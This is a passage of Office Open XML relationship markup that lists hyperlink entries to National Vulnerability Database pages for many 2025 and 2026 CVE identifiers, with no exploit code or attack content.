Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId1490" /><Relationship 